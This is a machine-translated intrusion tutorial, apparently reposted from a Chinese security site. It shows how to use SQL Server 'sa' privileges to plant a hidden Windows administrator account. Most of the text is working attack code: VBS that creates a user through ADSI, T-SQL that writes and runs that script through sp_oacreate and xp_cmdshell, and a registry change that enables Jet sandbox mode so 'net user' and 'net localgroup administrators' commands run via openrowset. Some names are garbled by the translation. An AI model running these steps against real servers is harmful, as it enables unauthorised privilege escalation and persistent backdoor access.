SQLServerSA permission latest intrusion method _ MySQL

Source: Internet
Author: User
SQLServerSA permission latest intrusion method bitsCN.com

The server administrator or the administrator cannot add an administrator account because net.exeand net1.exe are restricted. We know that VBS has a winnt object in the Active Directory (ADSI) to manage local resources. you can add an administrator without using commands such as CMD. the specific code is as follows:
Set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")

OS = "WinNT: //" & wsnetwork. ComputerName

Set ob = GetObject (OS) 'to get the adsi interface, bind

Set oe = GetObject (OS & "/Administrators, group") 'attribute, admin group

Set od = ob. Create ("user", "test") 'creates a user

Od. SetPassword "1234" 'set password

Od. setinfo' save

Set of = GetObject (OS & "/test", user) 'to get the user

Oe. add OS & "/test"

Save the above code as 1.vbsand run the command "cscript 1. vbs". In this way, a user named test and password 1234 will be added to the system. The code executed in the query analyzer is as follows:

Declare @ o int, @ f int, @ t int, @ ret int

Exec sp_oacreate 'scripting. filesystemobject ', @ o out

Exec sp_oamethod @ o, 'createtextfile', @ f out, 'C:/1. vbs ', 1

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set wsnetwork = CreateObject

("WSCRIPT. NETWORK ")'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL,' OS = "WinNT: //" & wsnetwork.

Computername'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set ob = GetObject (OS )'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set oe = GetObject

(OS & "/Administrators, group ")'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set od = ob. Create

("User", "test ")'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'od. SetPassword "1234 "'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'od. setinfo'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'set of = GetObject

(OS & "/test", user )'

Exec @ ret = sp_oamethod @ f, 'writeline ', NULL, 'Oe. add OS & "/test "'

After the preceding statement is executed, execute the following line of code. this line of code must be executed independently. do not run it with the preceding statement. Otherwise, the prompt "c:/1. vbs is being run by another program, and users cannot be added successfully:

Exec master .. xp_mongoshell 'cscript c:/1. vbs'

If the system user is not added successfully, it may be because the system user's password 1234 is too simple and does not comply with the complex password policy of the server. you can consider the complexity of the settings and then test it. You can also use echo to write the code to 1. vbs. the code format is:

Exec master .. xp_mongoshell 'echo set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")

> 1. vbs'

However, I don't know why all command lines with "&" characters cannot write 1.vbs. if you are interested, try to solve it.

The jet sandbox mode solves the troubles caused by stored procedures such as xp_mongoshell and related dynamic link libraries. For security reasons, the sandbox mode is disabled by default. Therefore, xp_regwrite is required to enable the sandbox mode:

Exec master. dbo. xp_regwrite 'hkey _ LOCAL_MACHINE ', 'software/Microsoft/Jet/4.0

/Engines ', 'sandboxmode', 'Reg _ dword', 1

Then run the sandbox command to add a user with the username test and password 1234 to the system:

Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c:/windows

/System32/ias. mdb ', 'Select shell ("cmd.exe/c net user test 1234/add ")')

Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c:/windows

/System32/ias. mdb ', 'Select shell ("cmd.exe/c net localgroup

Administrators test/add ")')

Different operating systems have different paths and must be modified as needed:

BitsCN.com

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.